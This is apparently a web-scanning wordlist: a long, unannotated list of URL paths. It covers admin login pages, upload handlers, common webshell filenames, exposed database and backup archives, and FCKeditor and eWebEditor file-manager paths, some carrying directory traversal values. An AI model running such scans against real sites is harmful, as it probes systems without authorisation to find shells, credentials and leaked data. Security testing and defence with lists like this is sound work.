/eWeb/admin_login.aspx
/ewebedit/ewebeditor.aspx
/eWebEditor_v280_Free/admin_login.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspxx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/fileadmin.aspx
/format.aspx
/forum/upfile.aspx
/fpv_admin/admin.aspx
/g_admin.aspx
/gb/register.aspx
/gbook/login.aspx
/gl.aspx
/gl/adminlogin.aspx
/gladmin.aspxx
/gladmin/login.aspx
/gllogin.aspxx
/guan/guanli.aspx
/guanli/admin.aspx
/guanli/index.aspx
/guanli/login.aspx
/guanliadmin.aspx
/guanlilog.aspx
/guanlilogin.aspx
/guanliyuan.aspx
/guest/login.aspx
/guestbook/login.aspx
/guestbook/man.aspx
/houtai/admin.aspx
/houtai/Admin_Login.aspx
/Hradmin/admin.aspx
/htmedit/admin_login.aspx
/id_pass.aspx
/inadmin.aspx
/inc/config.aspx
/index_Default.aspx?
/indexDefault.aspx?
/info.aspx
/inforadmin.aspx
/Kes/Admin/Admin_Login.aspx
/kycj/kycj/login.aspx
/land/land.aspx
/lavery_Edit/Admin_Login.aspx
/Library/DbConnect.aspx
/link/admin_login.aspx
/liuyan/login.aspx
/logi.aspx
/login.aspxx
/login/admin.aspx
/login/admin/admin.aspx
/login/Default.aspx?
/login/index.aspx
/login/login.aspx
/login/logout.aspx
/login/super.aspx
/login_Default.aspx?
/loginDefault.aspx?
/loginini.aspx
/loginsys.aspx
/logsys.aspx
/lyb/admin_login.aspx
/lyb/login.aspx
/main/login.aspx
/manage/admin.aspx
/manage/admin_index.aspx
/manage/admin_login.aspx
/manage/AdminLogin.aspx
/manage/Edit/admin_login.aspx
/manage/Editor/admin_login.aspx
/manage/eweb/admin_login.aspx
/manage/eWebEditor/admin_login.aspx
/manage/eWebEditor_v280_Free/admin_login.aspx
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/manage/htmedit/admin_login.aspx
/manage/index.aspx
/manage/login.aspx
/manage/login/Login.aspx
/manage/WebEdit/admin_login.aspx
/manage/WebEditor/admin_login.aspx
/management/login.aspx
/manager.aspx
/manager/admin.aspx
/manager/admin/admin_login.aspx
/manager/admin_index.aspx
/manager/admin_login.aspx
/manager/index.aspx
/manager/left.aspx
/manager/login.aspx
/manager/manager.aspx
/manager/ndex.aspx
/manages.aspx
/master/memmng/login.aspx
/mem/login.aspx
/member/admin.aspx
/member/login.aspx
/mg/Login.aspx
/modelsearch/login.aspx
/moderator.aspx
/moderator/admin.aspx
/moderator/login.aspx
/mybbssaveup.aspx
/new/admin_index.aspx
/new/Admin_New/default.aspx
/newbbs/login.aspx
/news/admin/default.aspx
/news/admin/upfile.aspx
/news/admin_login.aspx
/news/login.aspx
/news/manage/login.aspx
/news/newadmin/test.aspx
/office.aspxx
/office/login.aspx
/password_search.aspx
/Product/manage/login.aspx
/profile/login.aspx
/project/webpet/login.aspx
/root/login.aspx
/rootceo.aspx
/Server.aspx
/show/back/index.aspx
/soft_admin.aspxx
/stock/login.aspx
/supervise/Login.aspx
/sxadmin/index.aspx
/sys/admin/login.aspx
/sys/login.aspx
/sys_manage/sys_index.aspx
/sysadmin.aspx
/SysAdmin/login.aspx
/sysadmins.aspx
/syslog.aspx
/syslogi.aspx
/syslogin.aspx
/system/default.aspx
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/system/index.aspx
/system/login.aspx
/system/manage.aspx
/system/manage/index.aspx
/systemceo.aspx
/systemroot.aspx
/systems/login.aspx
/szwyadmin/login.aspx
/tacforo/admin_login.aspx
/toucher/admin_login.aspx
/trade/admin/Login.aspx
/tryread/forbook1.aspx   
/union/admin.aspx
/upload_soft.aspx
/UploadSoft/diy.aspx
/ur-admin.aspx
/user/admin.aspx
/user/index.aspx
/user/login.aspx
/user/logout.aspx
/user/super.aspx
/user_Default.aspx?
/userDefault.aspx?
/vip_manage/login.aspx
/vipuser.aspx
/vipuser_login.aspx
/webDefault.aspx?
/webedit/admin_login.aspx
/webedit1/admin_login.aspx
/WebEditor/admin_login.aspx
/weihu/login.aspx
/yonetici.aspx
/yonetim.aspx
/zkcf/login.aspx
/登陆.aspx
/管理员.aspx
/假地址.aspx
/basedadmin.aspx
/upfile_photo.aspx 
/upfile_softpic.aspx 
/upfile_adpic.aspx
/upfile.aspx 
/upload.aspx 
/Upfile_Article.aspx 
/Upfile_AdPic.aspx 
/Upfile_OrderPic.aspx
/Upfile_AdPia.aspx 
/Upfile_Articla.aspx
/databass/datashop.aspx
/Upfile_Soft.aspx 
/index.php
/changepwd.php
/admin_index.php
/star.php
/book.php
/moban.php
/default.php
/2006.php
/add.php
/aspadmin.php
/admin_admin.php
/Link/upload/upload.php
/upload/upload.php
/fileup.php
/LookupPass.php
/shipin.php
/mylink.php
/index0.php
/Admin_Login588.php
/dbconn_logo.php
/Admin_Login888.php
/Admin_Login8.php
/Upfilem.php
/Upfilep.php
/upfilexinxi.php
/wjleft.php
/ppbd.php
/admintghdhgfb.php
/Uploaddd.php
/cxhd.php
/baoming.php
/admincxfb.php
/Char.php
/ggfb.php
/yx_Update.php
/Admin_Field.php
/qyjxy.php
/Admin_Database.php
/gsjj.php
/wzgg.php
/tjly.php
/Admin_Help_User.php
/Admin_Label.php
/Admin_Maillist.php
/xwzx.php
/zllm.php
/zxly.php
/admin_htmlqx.php
/Admin_UploadFile_Style.php
/test_upload.php
/Admin_Message.php
/enterprise/upfile.php
/UserList.php
/Admin_Photo.php
/admin_config.php
/darkst.php
/admin_config.php.bak
/admin_data.php
/admin_data.php.bak
/admin_default.php
/admin_edit.php
/admin_login.php
/admin_master.php
/admin_member.php
/admin_setup.php
/admin_upfile.php
/admin_uploadfile.php
/admin_uploadfile_user.php
/admin_user.php
/article.php
//szwyadmin/login.php
/articleinfo.php
/edi/admin/login.php
/blog.php
/build.php
/ewebsoft/admin_login.php
/ASPXspy2.phpx
/admin_manage_access/login.php
/admin_manage/login.php
/Upfiledd.php
/aspxspy.phpx
/changepass.php
/Upload_Photo.php
/cmd.php
/code.php
/admin/web_login.php
/web_login.php
/code.php.bak
/Stats.php
/config.php
/config.php.bak
/conn.php
/guli/login.php
/conn.php.bak
/connection.php
/connection.php.bak
/count.php
/create.php
/daemon.php
/kwadmin/A_Login.php
/default.php.bak
/default_1.php
/default_1.php.bak
/default1.php
/ewebeditor/asp/browse.php
/default1.php.bak
/default2.php
/default2.php.bak
/diy.php
/down_addsoft.php
/down_picupfile.php
/down_picupload.php
/edit.php
/email.php
/err.php
/error.php
/ewebeditor.php
/funciton.php.bak
/A_Login.php
/function.php
/getpass.php
/go.php
/head.php
/img_upfile.php
/inc.php
/inc.php.bak
/index.php.bak
/index1.php
/incFiles/load_gg.php
/upload_flash_.php
/qyml/upproduce.php
/upproduce.php
/index1.php.bak
/install.php
/js.php
/left.php
/list.php
/login.php
/logon.php
/logout.php
/usergroup_0.php
/forumdata/cache/usergroup_0.php
/main.php
/manage.php
/md5.php
/member_list.php
/more.php
/news.php
/news_list.php
/organise.php
/open.php
/open.php.bak
/pass.php
/passwd.php
/password.php
/photo.php
/popup.php
/readme.php
/reg.php
/register.php
/reload.php
/rss.php
/rss1.php
/rss2.php
/rssfree.php
/Saveannounce_upload.php
/savecomment.php
/savemessage.php
/saveup.php
/search.php
/setup.php
/setup.php.bak
/shell.php
/show.php
/shownews.php
/syscode.php
/syscode.php.bak
/sytle.php
/tb.php
/test.php
/test.php.bak
/upfile_flash.php
/upfile_soft.php
/Upfile_SoftPic.php
/UploadFace.php
/uploadfaceok.php
/user.php
/user_files.php
/user_friends.php
/user_help.php
/user_index.php
/user_login.php
/user_message.php
/user_messages.php
/user_setting.php
/user_subject.php
/user_top.php
/user_update.php
/user_upfile.php
/ver.php
/vote.php
/warning.php
/webshell.php
/administrator.php
/boss/admin.php
/m_login.php
/adminlogin.php
/Zzm.php 
/My-login.php
/1ndex.php
/ManageLogin.php
/HX_LOGIN.php
/editor/admin_login.php
/eWebEditor/admin_login.php
/admin/eWebEditor/admin_login.php
/admin/editor/admin_login.php
/dl.php
/Admin_DataBackup.php
/Data_Backup.php
/admin_backup.php
/admin_db_backup.php?action=BackupData
/Manage_backup.php?action=Backup
/admin_data.php?action=BackupData
/Manage_backup.php
/Data_Return.php
/admin_db_backup.php?action=RestoreData
/admin_data.php?action=RestoreData
/gldl.php
/logo.php
/admin_style.php
/sqlin.php
/inc/upload_flash.php
/upload_flash.php
/db.php
/dbb.php
/NewsUpLoad.php
/inc_config.php
/b2b_sysdata.php
/webconfig.php
/Fy_SqlX.php
/lostpass.php
/Neeao_SqlIn.php
/Neeao_sql_admin.php
/bottom.php
/foot.php
/end.php
/top.php
/setting.php
/admin_webmaster.php
/GetPassword.php
/findpassword.php
/User_GetPassword.php
/change_password.php
/update.php
/adduser.php
/xiaoma.php
/dama.php
/gbook.php
/webadmin.php
/admin_login_lg.php
/admin_sql.php
/admin_backupdata.php
/admin_Restoredata.php
/admin_EditPass.php
/admin_server.php
/default_right.php
/Gas_login.php
/ScanShell.php
/%23sql.php
/sql.php
/admin_db_backup.php
/admin_set.php
/admin_setting.php
/admincheck.php
/adminfso.php
/data.php
/SysUser.php
/check.php
/link.php
/links.php
/Sys_admin.php
/a_main.php
/adminda.php
/login1.php
/ad.php
/ad_login.php
/ad_manage.php
/addlb.php
/addmember.php
/adm_login.php
/Admin_BatchLink.php
/admin_del.php
/admin_delete.php
/admin_main.php
/Admin_SoftInfo.php
/admin1.php
/admin888.php
/adminadduser.php
/admindel.php
/admindelete.php
/adminedit.php
/adminmember.php
/adminuserlogin.php
/admintab.php
/adminuser.php
/chkadmin.php
/chklogin.php
/denglu.php
/edituser.php
/editmember.php
/index_admin.php
/index_manage.php
/guanli.php
/guanli-cn.php
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.php
/connector.php
/houtai.php
/houtaiguanli.php
/htgl.php
/login_admin.php
/login_out.php
/manage_index.php
/member.php
/members.php
/adm_menu.php
/bm/chkadmin.php
/Select_feedback.php
/admin_6list.php
/users.php
/sys.php
/adm.php
/system.php
/systems.php
/aspcheck.php
/hacker.php
/123.php
/3800cc.php
/hack.php
/sys_login_easysite.php
/adlogin.php
/login_message.php
/adminindex.php
/UserLogin.php
/login_manage.php
/gg_login.php
/sysadm_login.php
/manage_login.php
/xh_login.php
/admincs.php
/land.php
/elogin.php
/loginManage.php
/yns_login.php
/vo_login.php
/lygofa.php
/wen_login.php
/jswadmin.php
/admlogin.php
/ImageGallery.phpx?rif=/&cif=../&ftb=reProduct_content2
/default_Image.php
/forbook1.php
/upfile_Dialog.php
/upimg.php
/upload.php?action=upfile
/upload_add.php
/upload_browse.php
/upload_new_ad.php
/1.php
/11.php
/111.php
/1234.php
/12345.php
/123456.php
/ewebeditor.php?id=x&style=standard
/22.php
/222.php
/3.php
/33.php
/333.php
/ASPAdmin_A.php
/DbConnect.php
/Login_ok.php
/USERok.php
/_admin.php
/a.php
/aa.php
/aaa.php
/ad_admin_login.php
/add_admin.php
/add_user.php
/admcheck.php
/admcheckform.php
/admin123.php
/admin2.php
/admin_bak.php
/admin_count.php
/admin_forums.php
/admin_home.php
/admin_info.php
/admin_pass.php
/admin_test.php
/adminadmin.php
/administration.php
/admins.php
/admout.php
/admsystem.php
/adoconn.php
/asdf.php
/aspcmd.php
/auto.php
/back.php
/backadm.php
/backup.php
/base64.php
/bbs.php
/bbs1.php
/c99.php
/cao.php
/caonima.php
/cfg.php
/cipher.php
/cmdasp.php
/command.php
/common.php
/conf.php
/connstr.php
/console.php
/const.php
/consts.php
/count_admin.php
/cp.php
/crypto.php
/cshell.php
/css.php
/d99.php
/db_con.php
/dbconn.php
/decrypt.php
/default_admin.php
/default_login.php
/del.php
/del_admin.php
/del_member.php
/delete.php
/deletemember.php
/devel.php
/System/Function/UploadProductPic.php
/Function/UploadProductPic.php
/UploadProductPic.php
/digshell0.php
/digshell2.php
/diy3.php
/dm.php
/do.php
/down.php
/dtest.php
/emyuser_login.php
/encrypt.php
/exit.php
/file.php
/files.php
/findaccount.php
/forum.php
/frame.php
/freeweb_admin.php
/fuck.php
/fuckyou.php
/girl.php
/girls.php
/global.php
/guanli-tw.php
/hate.php
/hello.php
/ht.php
/htdocs.php
/idea.php
/ideas.php
/inFile.php
/include.php
/includeinc.php
/includes.php
/incoming.php
/index_test.php
/indexadmin.php
/insert.php
/inside.php
/intranet.php
/key.php
/kill.php
/link_admin.php
/local.php
/log.php
/logger.php
/login_check.php
/login_from.php
/login_in.php
/loginerror.php
/loginform.php
/loginok.php
/loginsave.php
/loginsuper.php
/love.php
/luck.php
/m.php
/ma.php
/main1.php
/mainframe.php
/maintain.php
/man.php
/manager_login.php
/managers.php
/manual.php
/master.php
/member_download.php
/memberlogin.php
/menu.php
/mgr.php
/misc.php
/mm.php
/mmgr.php
/mmm.php
/mrtg.php
/muma.php
/my.php
/myadmin.php
/myup.php
/new.php
/upfile.php
/upload.php
/newadmin.php
/news_admin.php
/newsadmin.php
/ok.php
/ok_pass.php
/other.php
/phpcmd.php
/phpinfo.php
/phpspy.php
/post_upfile.php
/post_upload.php
/private.php
/program.php
/programming.php
/programs.php
/public.php
/reg_upload.php
/reg_upload1.php
/reg_user.php
/root.php
/sadmin.php
/savelogin.php
/secret.php
/secrets.php
/server-info.php
/server-status.php
/server_stats.php
/servu.php
/set.php
/sever.php
/site.php
/smanager.php
/snmp.php
/source.php
/sources.php
/spy.php
/sqlconf.php
/stat.php
/statistics.php
/store.php
/ststems.php
/su.php
/super.php
/super1.php
/supplieradm.php
/sys_login.php
/sys_memu.php
/sysadm_index.php
/telephone.php
/temp.php
/temp_admin.php
/temporary.php
/test1.php
/test_download.php
/test_page.php
/tester.php
/tester_download.php
/tool.php
/tools.php
/up.php
/update_user.php
/usage.php
/user_admin.php
/userlook.php
/userslist.php
/wantpws.php
/weblog.php
/weblogs.php
/webmaster.php
/webstats.php
/include/upfile_asp.php
/include/upfile.php
/wenzhang.php
/include/upload_asp.php
/include/upload.php
/wish.php
/woaini.php
/wocaonima.php
/work.php
/write.php
/ws.php
/wstats.php
/www.php
/wwwlog.php
/x.php
/xiao.php
/xiaolu.php
/xm.php
/xx.php
/xxx.php
/yes.php
/z.php
/zz.php
/zzz.php
/newsupfile.php
/Up_BookPicPro.php
/upLoad_bm1.php
/upLoad_c1.php
/uploadPic.php
/upNewsIMg.php
/picupsave2.php
/hege.php
/mywebshell.php
/fileupimg2.php
/upfile_photo.php
/userreg_setp2.php
/lovebaobao.php
/mymm.php
/newmm.php
/saveupload.php
/manage/upfile.php
/zs_save_add.php
/UploadImage3_upload.php
/upfile1.php
/upfilea.php
/upme2.php
/addFile.php
/addPicture.php
/upme1.php
/uploadfilm.php
/upfile_Other.php
/upsave.php
/uploadphoto.php
/web_upfile.php
/upfile2.php
/photosave.php
/sub_upload.php
/s_image.php
/newsimage1.php
/picupsave.php
/picupload.php
/upload2.php
/uploada.php
/upload1.php
/upfile_article.php
/uploadfiles.php
/uploadfiles1.php
/showimg.php
/Upfile_ProductPic.php
/Upload_ProductPic.php
/upfiles.php
/upfile3.php
/upload3.php
/admin_uploadF.php
/admin_upload.php
/Upfile_pic.php
/Upfile_pics.php
/Upfile_Product.php
/articleadmin.php
/loginadmin.php
/eye2007Admin_login.php
/infom_login.php
/KesAdmin_Login.php
/localhostlogin.php
/cz_login.php
/Articlelogin.php
/xxmslogin.php
/downlogin.php
/bbsLogin.php
/ewebeditor1013.php
/shopb2b_sysdata.php
/asplogin.php
/tradeLogin.php
/6k.php
/zm_marry.php
/fdnews.php
/play.php
/mdb.php
/joekoe_data.php
/news3000.php
/configuration/system/Upload_user.php
/12912.php
/database.php
/starark.php 
/download.php
/tiyisw.php
/datashop.php
/liaoxd.php
/Fl_Web.php
/Hz@host!.php 
/lennyash.php
/roha.php
/Skyj.php
/wrtxcnqywz4.php
/wygkcnqyhtml.php
/PBlog2.php
/PBlog1.php
/PBlog3.php
/oask.php
/heiren.php
/115cn.php
/dvboke.php
/asp99cms.php
/../admin.php
/../admin/default.php
/../admin/index.php
/../admin/login.php
/../admin/manage.php
//admin/login.php
/11111/index.php
/88888/index.php
/a_admin.php
/a_admin.phpx
/account.php
/acct/login.php
/ad_admin/admin_login.php
/admin.phpx
/admin/account.php
/admin/adm_menu.php
/admin/admin.phpx
/admin/admin_6list.php
/Admin/Admin_Index.php
/admin/admin_login.php
/admin/admin_upfile.php
/admin/adminlogin.php
/admin/aspcheck.php
/admin/controlpanel.php
/admin/cp.php
/admin/default.php
/admin/Default.php?
/admin/default/admin.php
/admin/default/login.php
/admin/edit/admin_login.php
/admin/editor/admin_login.php?
/admin/eWebEditor_v280_Free/admin_login.php
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/admin/go.php
/admin/home.php
/admin/htmedit/admin_login.php
/admin/index.php
/admin/left.php
/admin/login.php
/admin/lygofa.php
/admin/manage.php
/admin/manage/admin.php
/admin/manage/login.php
/admin/menu.php
/admin/news.php
/admin/ows_login.php
/admin/Select_feedback.php
/admin/test.php/info.php
/admin/upfile.php
/admin/upload.php
/admin/uploadfaceok.php
/admin/user_login.php
/admin/WebEditor/admin_login.php
/admin/xh_login.php
/admin/yns_login.php
/admin_.php
/admin_body.php
/admin_Default.php?
/admin_index/admin_index.php
/admin_index/login.php
/WebEditor/admin_uploadfile.php?id=14&dir=../../..
/Admin_jsCreate.php
/admin/admin_uploadfile.php
/admin_login/admin.php
/admin_login/login.php
/admin_manage_access/Admin_Default.php
/admin_move/Admin_Login.php
/admin_soft.php
/admin_soft.phpx
/Admin_SoftCateMenu.php
/Admin_SoftLink.php
/Admin_SoftList.php
/Admin_SubCate.php
/Admin_UpdateSoftNum.php
/Admin_UserSetting.php
/admin_yuzhiguo/login.php
/Admin_ZgTea_Art/Login.php
/admin1/Admin_Login.php
/adminceo.php
/admincn2008/login.php
/admincontrol.php
/adminDefault.php?
/AdminFile/Admin_Login.php
/adminin.php
/administr8.php
/administrator/account.php
/administrator/admin.php
/administrator/index.php
/administrator/login.php
/adminkey.php
/adminlog.php
/admin-login/login.php
/adminpanel.php
/adminroot.php
/admins_login.php
/adminsys.php
/adsystem/index.php
/amd/index.php
/amd/login.php
/amd/super.php
/amd_/admin.php
/amd_/index.php
/amd_/login.php
/amd_/super.php
/art.php
/article/admin/admin.php
/asjobcom/index.php
/asp.php
/asp/admin/login.php
/b_admin.php
/back/login.php
/basedadmin/admin_login.php
/bbs/admin_index.php
/bbs/admin_login.php
/bbs/diy.php
/bbs/down_addsoft.php
/bbs/down_picupfile.php
/bbs/elogin.php
/bbs/login.php
/bbs/post_upfile.php
/bbs/post_upload.php
/bbs/reg_upload.php
/bbs/saveup.php
/bbs/upfile.php
/bbs/upload_soft.php
/bestcollegepicks/login.php
/book/login.php
/book1/login.php
/boss/admin_login.php
/boss/login.php
/boss/WebEditor/admin_login.php
/careerfocus/Login.php
/ccms/index.php
/ccms/login.php
/CEO.php
/ceoadmin.php
/cgi-bin/login.php
/cgi-bin/System/Userlogin.php
/cjcx/login.php
/CmsEditor/Upload.php 
/college/index.php
/controlpanel.php
/count/supervise/Login.php
/Create_Commend.php
/Create_Default.php
/Create_jsNews.php
/Create_jsSearch.php
/Create_New.php
/Create_Other.php
/Create_SoftCate.php
/Create_SoftList_All.php
/Create_SoftList_Cate.php
/databases.php
/dbase.php
/Default_Default.php?
/Default_index.php
/denglu/admin.php
/down/login.php
/dvbbs/down_addsoft.php
/dvbbs/post_upfile.php
/dvbbs/post_upload.php
/dvbbs/reg_upload.php
/dvbbs/saveup.php
/dvbbs/upfile.php
/dvbbs/upload_soft.php
/dxxobbs/upload.php
/eadmin/login.php
/edit/admin_login.php
/editor/admin_login.php?
/editor/upload.php 
/eWeb/admin_login.php
/ewebedit/ewebeditor.php
/eWebEditor_v280_Free/admin_login.php
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.php
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.phpx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.php
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/fileadmin.php
/format.php
/forum/upfile.php
/fpv_admin/admin.php
/g_admin.php
/gb/register.php
/gbook/login.php
/gl.php
/gl/adminlogin.php
/gladmin.php
/gladmin.phpx
/gladmin/login.php
/gllogin.php
/gllogin.phpx
/guan/guanli.php
/guanli/admin.php
/guanli/index.php
/guanli/login.php
/guanliadmin.php
/guanlilog.php
/guanlilogin.php
/guanliyuan.php
/guest/login.php
/guestbook/login.php
/guestbook/man.php
/houtai/admin.php
/houtai/Admin_Login.php
/Hradmin/admin.php
/htmedit/admin_login.php
/id_pass.php
/inadmin.php
/inc/config.php
/index_Default.php?
/indexDefault.php?
/info.php
/inforadmin.php
/Kes/Admin/Admin_Login.php
/kycj/kycj/login.php
/land/land.php
/lavery_Edit/Admin_Login.php
/Library/DbConnect.php
/link/admin_login.php
/liuyan/login.php
/logi.php
/login.phpx
/login/admin.php
/login/admin/admin.php
/login/Default.php?
/login/index.php
/login/login.php
/login/logout.php
/login/super.php
/login_Default.php?
/loginDefault.php?
/loginini.php
/loginsys.php
/logsys.php
/lyb/admin_login.php
/lyb/login.php
/main/login.php
/manage/admin.php
/manage/admin_index.php
/manage/admin_login.php
/manage/AdminLogin.php
/manage/Edit/admin_login.php
/manage/Editor/admin_login.php
/manage/eweb/admin_login.php
/manage/eWebEditor/admin_login.php
/manage/eWebEditor_v280_Free/admin_login.php
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/manage/htmedit/admin_login.php
/manage/index.php
/manage/login.php
/manage/login/Login.php
/manage/WebEdit/admin_login.php
/manage/WebEditor/admin_login.php
/management/login.php
/manager.php
/manager/admin.php
/manager/admin/admin_login.php
/manager/admin_index.php
/manager/admin_login.php
/manager/index.php
/manager/left.php
/manager/login.php
/manager/manager.php
/manager/ndex.php
/manages.php
/master/memmng/login.php
/mem/login.php
/member/admin.php
/member/login.php
/mg/Login.php
/modelsearch/login.php
/moderator.php
/moderator/admin.php
/moderator/login.php
/mybbssaveup.php
/new/admin_index.php
/new/Admin_New/default.php
/newbbs/login.php
/news/admin/default.php
/news/admin/upfile.php
/news/admin_login.php
/news/login.php
/news/manage/login.php
/news/newadmin/test.php
/office.php
/office.phpx
/office/login.php
/password_search.php
/Product/manage/login.php
/profile/login.php
/project/webpet/login.php
/root/login.php
/rootceo.php
/Server.php
/show/back/index.php
/soft_admin.php
/soft_admin.phpx
/stock/login.php
/supervise/Login.php
/sxadmin/index.php
/sys/admin/login.php
/sys/login.php
/sys_manage/sys_index.php
/sysadmin.php
/SysAdmin/login.php
/sysadmins.php
/syslog.php
/syslogi.php
/syslogin.php
/system/default.php
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/system/index.php
/system/login.php
/system/manage.php
/system/manage/index.php
/systemceo.php
/systemroot.php
/systems/login.php
/szwyadmin/login.php
/tacforo/admin_login.php
/toucher/admin_login.php
/trade/admin/Login.php
/tryread/forbook1.php   
/union/admin.php
/upload_soft.php
/UploadSoft/diy.php
/ur-admin.php
/user/admin.php
/user/index.php
/user/login.php
/user/logout.php
/user/super.php
/user_Default.php?
/userDefault.php?
/vip_manage/login.php
/vipuser.php
/vipuser_login.php
/webDefault.php?
/webedit/admin_login.php
/webedit1/admin_login.php
/WebEditor/admin_login.php
/weihu/login.php
/yonetici.php
/yonetim.php
/zkcf/login.php
/登陆.php
/管理员.php
/假地址.php
/basedadmin.php
/upfile_photo.php 
/upfile_softpic.php 
/upfile_adpic.php
/upfile.php 
/upload.php 
/Upfile_Article.php 
/Upfile_AdPic.php 
/Upfile_OrderPic.php
/Upfile_AdPia.php 
/Upfile_Articla.php
/databass/datashop.php
/Upfile_Soft.php 
/DataBackup/1.asp
/DataBackup/111.asp
/DataBackup/123.asp
/DataBackup/222.asp
/DataBackup/a.asp
/DataBackup/aa.asp
/DataBackup/ad.asp
/DataBackup/asdf.asp
/DataBackup/ASPAdmin.asp
/DataBackup/ASPAdmin_A.asp
/DataBackup/c99.asp
/DataBackup/cao.asp
/DataBackup/caonima.asp
/DataBackup/cmd.asp
/DataBackup/command.asp
/DataBackup/cshell.asp
/DataBackup/css.asp
/DataBackup/d99.asp
/DataBackup/default1.asp
/DataBackup/digshell0.asp
/DataBackup/digshell2.asp
/DataBackup/diy.asp
/DataBackup/diy3.asp
/DataBackup/dm.asp
/DataBackup/do.asp
/DataBackup/error.asp
/DataBackup/fuck.asp
/DataBackup/fuckyou.asp
/DataBackup/hack.asp
/DataBackup/hacker.asp
/DataBackup/hate.asp
/DataBackup/hello.asp
/DataBackup/index1.asp
/DataBackup/log.asp
/DataBackup/love.asp
/DataBackup/luck.asp
/DataBackup/m.asp
/DataBackup/main1.asp
/DataBackup/mm.asp
/DataBackup/mmm.asp
/DataBackup/my.asp
/DataBackup/myup.asp
/DataBackup/new.asp
/DataBackup/news.asp
/DataBackup/ok.asp
/DataBackup/phpinfo.asp
/DataBackup/phpspy.asp
/DataBackup/root.asp
/DataBackup/servu.asp
/DataBackup/shell.asp
/DataBackup/spy.asp
/DataBackup/su.asp
/DataBackup/temp.asp
/DataBackup/webshell.asp
/DataBackup/wish.asp
/DataBackup/woaini.asp
/DataBackup/ws.asp
/DataBackup/x.asp
/DataBackup/xiao.asp
/DataBackup/xiaolu.asp
/DataBackup/xm.asp
/DataBackup/xx.asp
/DataBackup/xxx.asp
/DataBackup/yes.asp
/DataBackup/z.asp
/DataBackup/zz.asp
/DataBackup/zzz.asp
/New File.txt
/21ex/jihe.asp
/25175guestbook.mdb
/access/sf2.mdb
/admin/data/%23down19827.asp
/admin/data/qcdn_news.mdb
/admin/data/sub.mdb
/admin/data/user.asp
/admin/Databackup/NewCloud_backup.mdb
/admin/htmledit/db/ewebeditor.mdb
/admin/webedit//db/ewebeditor.mdb
/admin/webeditor//db/ewebeditor.mdb
/admin/wolf.asp
/admin/ydxzdate.asa
/AdminMain.asp
/ajstat.mdb
/base.asp
/base.mdb
/baseconn.asp
/baseconn.inc
/bbs/access/sf2.mdb
/bbs/boke/data/dvboke.asp
/bbs/data/dvbbs6.mdb
/bbs/data/dvbbs7.mdb
/bbs/data/dvbbs8.mdb
/bbs/data/dvboke.asp
/bbs/Data/LeadBBS.mdb
/bbs/data/mdb.mdb
/bbs/Data/MirCMS_BBS_Dvbbs7_010101.mdb
/bbs/databackup/dvbbs7.mdb
/bbs/databackup/dvbbs7_Backup.mdb
/bbs/database/bbsxp.mdb
/bbs/database/bbsxp2007.mdb
/bbs/DV_plus/marry/update.asp
/bbs/fdnews.asp
/bbs/update.asp
/blog/blogdata/L-BLOG.mdb
/blog/DATA/zblog.mdb
/blogdata/L-BLOG.mdb
/blogDB/PBLog3.asp
/boke/data/dvboke.asp
/BOOK.MDB
/CAurl11.txt
/cnn.asp
/cnn.inc
/conn.inc
/Connections/baseinc.asp
/Connections/baseinc.inc
/Connections/cnn.asp
/Connections/cnn.inc
/Connections/conn.asp
/Connections/conn.inc
/Connections/Connections.asp
/Connections/Connections.inc
/dat.asp
/dat.mdb
/dat.rar
/dat.zip
/data.bak
/data.mdb
/data/%239988.mdb
/data/%239btobwen.mdb
/data/%23db1.asp
/Data/%23vvskybbs.asp
/data/12912.asp
/data/6kbbs.mdb
/data/allen%23.mdb
/data/appoen.mdb
/data/base.asp
/data/base.mdb
/data/bbs.mdb
/data/cnmai.mdb
/data/data%23.asp
/data/data%23.mdb
/data/data.asp
/Data/data.bak
/Data/data.mdb
/Data/data.rar
/Data/data.zip
/data/database.mdb
/data/date.mdb
/Data/db.asp
/Data/db.bak
/Data/db.mdb
/Data/db.rar
/Data/db.zip
/data/db1.mdb
/data/down.mdb
/data/download.mdb
/data/dvbbs5.mdb
/data/dvbbs6.mdb
/data/dvbbs7.mdb
/data/dvbbs8.mdb
/data/dvboke.asp
/data/findsf.mdb
/data/game.mdb
/data/Joekoe_CMS_4.0.mdb
/data/Leadbbs.mdb
/data/mdb.mdb
/data/music.mdb
/data/news3000.asp
/data/qcdn_news.mdb
/data/scadata.mdb
/Data/sql.rar
/data/sub.mdb
/data/team.mdb
/data/V6bbs.mdb
/Data/YxBBs.Asp
/DATA/zblog.mdb
/data/zm_marry.asp
/data_jk/joekoe_data.asp
/databack.rar
/databack.zip
/databackup.rar
/databackup.zip
/Databackup/dvbbs7.MDB
/Databackup/dvbbs7_Backup.mdb
/database.mdb
/database/#newasp.mdb
/DataBase/%236.1.mdb
/database/%236.5.mdb
/database/%23mmdata.mdb
/database/%23newasp.asa
/database/%23newasp.mdb
/database/bbsxp.mdb
/database/bbsxp2007.mdb
/database/bbsxp2008.mdb
/DataBase/bbsxp6.mdb
/database/Database.mdb
/database/new.mdb
/database/NewCloud6.mdb
/database/PE_Region.mdb
/database/PowerEasy2005.mdb
/database/PowerEasy2006.mdb
/database/PowerEasy2007.mdb
/database/PowerEasy2008.mdb
/database/PowerEasy4.mdb
/Database/PowerEasy5.mdb
/database/PowerEasy6.mdb
/database/snowboy.mdb
